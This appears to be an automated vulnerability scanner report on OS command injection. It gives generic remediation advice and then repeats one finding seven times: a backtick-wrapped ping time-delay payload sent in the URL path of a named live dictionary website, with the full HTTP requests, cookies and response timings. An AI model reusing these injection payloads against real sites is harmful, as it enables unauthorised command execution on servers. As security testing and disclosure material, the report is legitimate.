Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command to be executed, and inject arbitrary further commands that will be executed by the server.
OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. The exact potential for exploitation may depend upon the security context in which the command is executed, and the privileges which this context has regarding sensitive resources on the server.
Issue remediation
If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands than the one intended.
If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defense should be used to prevent attacks:
The user data should be strictly validated. Ideally, a whitelist of specific accepted values should be used. Otherwise, only short alphanumeric strings should be accepted. Input containing any other data, including any conceivable shell metacharacter or whitespace, should be rejected.
The application should use command APIs that launch a specific process via its name and command-line parameters, rather than passing a command string to a shell interpreter that supports command chaining and redirection. For example, the Java API Runtime.exec and the ASP.NET API Process.Start do not support shell metacharacters. This defense can mitigate the impact of an attack even in the event that an attacker circumvents the input validation defenses.
The REST URL parameter 2 appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.
The payload `ping%20-c%2020%20127.0.0.1` was submitted in the REST URL parameter 2. The application took 19198 milliseconds to respond to the request, compared with 331 milliseconds for the original request, indicating that the injected command caused a time delay.
Request
GET /dictionary/se`ping%20-c%2020%20127.0.0.1` HTTP/1.1 Host: www.merriam-webster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=117464725.1299459372.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jw-zid=mwvideo_autosilent2; pview=2; jw-autostart-view=1; __utma=117464725.1369065708.1299459372.1299459372.1299459372.1; __utmc=117464725; ptime=1299459986; __utmb=117464725.2.10.1299459372; __qca=P0-693446849-1299459372337; __qseg=Q_D|Q_T|Q_2884|Q_2775|Q_1799|Q_1361|Q_1360|Q_1355|Q_1353|Q_1349|Q_1345|Q_1343|Q_1340;
The REST URL parameter 2 appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.
The payload `ping%20-c%2020%20127.0.0.1` was submitted in the REST URL parameter 2. The application took 19208 milliseconds to respond to the request, compared with 256 milliseconds for the original request, indicating that the injected command caused a time delay.
Request
GET /dictionary/si`ping%20-c%2020%20127.0.0.1` HTTP/1.1 Host: www.merriam-webster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=117464725.1299459372.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jw-zid=mwvideo_autosilent2; pview=2; jw-autostart-view=1; __utma=117464725.1369065708.1299459372.1299459372.1299459372.1; __utmc=117464725; ptime=1299459986; __utmb=117464725.2.10.1299459372; __qca=P0-693446849-1299459372337; __qseg=Q_D|Q_T|Q_2884|Q_2775|Q_1799|Q_1361|Q_1360|Q_1355|Q_1353|Q_1349|Q_1345|Q_1343|Q_1340;
The REST URL parameter 2 appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.
The payload `ping%20-c%2020%20127.0.0.1` was submitted in the REST URL parameter 2. The application took 19201 milliseconds to respond to the request, compared with 483 milliseconds for the original request, indicating that the injected command caused a time delay.
Request
GET /dictionary/so`ping%20-c%2020%20127.0.0.1` HTTP/1.1 Host: www.merriam-webster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=117464725.1299459372.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jw-zid=mwvideo_autosilent2; pview=2; jw-autostart-view=1; __utma=117464725.1369065708.1299459372.1299459372.1299459372.1; __utmc=117464725; ptime=1299459986; __utmb=117464725.2.10.1299459372; __qca=P0-693446849-1299459372337; __qseg=Q_D|Q_T|Q_2884|Q_2775|Q_1799|Q_1361|Q_1360|Q_1355|Q_1353|Q_1349|Q_1345|Q_1343|Q_1340;
The REST URL parameter 2 appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.
The payload `ping%20-c%2020%20127.0.0.1` was submitted in the REST URL parameter 2. The application took 19203 milliseconds to respond to the request, compared with 248 milliseconds for the original request, indicating that the injected command caused a time delay.
Request
GET /dictionary/ss`ping%20-c%2020%20127.0.0.1` HTTP/1.1 Host: www.merriam-webster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=117464725.1299459372.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jw-zid=mwvideo_autosilent2; pview=2; jw-autostart-view=1; __utma=117464725.1369065708.1299459372.1299459372.1299459372.1; __utmc=117464725; ptime=1299459986; __utmb=117464725.2.10.1299459372; __qca=P0-693446849-1299459372337; __qseg=Q_D|Q_T|Q_2884|Q_2775|Q_1799|Q_1361|Q_1360|Q_1355|Q_1353|Q_1349|Q_1345|Q_1343|Q_1340;
The REST URL parameter 2 appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.
The payload `ping%20-c%2020%20127.0.0.1` was submitted in the REST URL parameter 2. The application took 19204 milliseconds to respond to the request, compared with 410 milliseconds for the original request, indicating that the injected command caused a time delay.
Request
GET /dictionary/x`ping%20-c%2020%20127.0.0.1` HTTP/1.1 Host: www.merriam-webster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=117464725.1299459372.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jw-zid=mwvideo_autosilent2; pview=2; jw-autostart-view=1; __utma=117464725.1369065708.1299459372.1299459372.1299459372.1; __utmc=117464725; ptime=1299459986; __utmb=117464725.2.10.1299459372; __qca=P0-693446849-1299459372337; __qseg=Q_D|Q_T|Q_2884|Q_2775|Q_1799|Q_1361|Q_1360|Q_1355|Q_1353|Q_1349|Q_1345|Q_1343|Q_1340;
The REST URL parameter 2 appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.
The payload `ping%20-c%2020%20127.0.0.1` was submitted in the REST URL parameter 2. The application took 20202 milliseconds to respond to the request, compared with 1270 milliseconds for the original request, indicating that the injected command caused a time delay.
Request
GET /dictionary/xss`ping%20-c%2020%20127.0.0.1` HTTP/1.1 Host: www.merriam-webster.com Proxy-Connection: keep-alive Referer: http://www.merriam-webster.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qseg=Q_D|Q_T|Q_2884|Q_2775|Q_1799|Q_1361|Q_1360|Q_1355|Q_1353|Q_1349|Q_1345|Q_1343|Q_1340; __qca=P0-693446849-1299459372337; __utmz=117464725.1299459372.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=117464725.1369065708.1299459372.1299459372.1299459372.1; __utmc=117464725; __utmb=117464725.1.10.1299459372
The REST URL parameter 2 appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.
The payload `ping%20-c%2020%20127.0.0.1` was submitted in the REST URL parameter 2. The application took 19209 milliseconds to respond to the request, compared with 171 milliseconds for the original request, indicating that the injected command caused a time delay.
Request
GET /dictionary/xu`ping%20-c%2020%20127.0.0.1` HTTP/1.1 Host: www.merriam-webster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=117464725.1299459372.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jw-zid=mwvideo_autosilent2; pview=2; jw-autostart-view=1; __utma=117464725.1369065708.1299459372.1299459372.1299459372.1; __utmc=117464725; ptime=1299459986; __utmb=117464725.2.10.1299459372; __qca=P0-693446849-1299459372337; __qseg=Q_D|Q_T|Q_2884|Q_2775|Q_1799|Q_1361|Q_1360|Q_1355|Q_1353|Q_1349|Q_1345|Q_1343|Q_1340;